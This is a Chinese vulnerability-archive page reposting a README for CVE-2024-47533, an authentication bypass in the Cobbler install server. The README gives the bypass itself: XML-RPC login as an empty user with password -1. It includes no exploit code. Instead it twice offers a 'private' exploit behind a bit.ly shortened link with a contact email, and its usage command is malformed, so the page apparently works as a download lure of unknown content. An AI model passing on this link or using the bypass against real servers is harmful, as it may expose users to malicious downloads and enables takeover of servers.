目标达成 感谢每一位支持者 — 我们达成了 100% 目标!

目标: 1000 元 · 已筹: 1359 元

100%

CVE-2024-47533 PoC — Cobbler 授权问题漏洞

来源
关联漏洞
标题: Cobbler 授权问题漏洞 (CVE-2024-47533)
Description:Cobbler是Cobbler开源的一款网络安装服务器套件,它主要用于快速建立Linux网络安装环境。 Cobbler 3.0.0到3.2.3和3.3.7之前版本存在授权问题漏洞,该漏洞源于身份验证不当,导致任何能够通过网络访问服务器的人都可以完全控制该服务器。
Description
CVE-2024-47533: Improper Authentication (CWE-287)
介绍
# CVE-2024-47533: Improper Authentication (CWE-287)

## Overview

Cobbler, a Linux installation server that allows for rapid setup of network installation environments, has an improper authentication vulnerability. This vulnerability gives anyone with network access to a Cobbler server full control of the server. The impact is severe, as it allows unauthorized access with the highest privileges.

## Details
+ CVE ID: CVE-2024-47533
+ Impact: Critical
+ Exploit Availability: Not public, only private.
+ CVSS: 9.8


## Exploit
**[Download Here](https://bit.ly/3ZcRKBx)**


## Vulnerability Description

The issue lies in the `utils.get_shared_secret()` function, which always returns `-1`. This flaw allows anyone to connect to the Cobbler XML-RPC as user `''` with password `-1` and make any changes.


## Affected Versions

This vulnerability affects versions starting from **3.0.0 and prior to versions 3.2.3 and 3.3.7.**

## Usage

```
pip install requirements.txt
python CVE-2024-47533.py
```


## Exploit
**[Download Here](https://bit.ly/3ZcRKBx)**


## Contact
For inquiries, please contact zetraxz@thesecure.biz

文件快照

登录后查看神龙缓存的 POC 文件快照

登录查看
备注
    1. 建议优先通过来源进行访问。
    2. 本地 POC 快照面向订阅用户开放;当原始来源失效或无法访问时,本地镜像作为订阅权益的一部分提供。
    3. 持续抓取、验证、维护这份 POC 档案需要不少投入,因此本地快照已纳入付费订阅。您的订阅是让这份资料能继续走下去的关键,由衷感谢。 查看订阅方案 →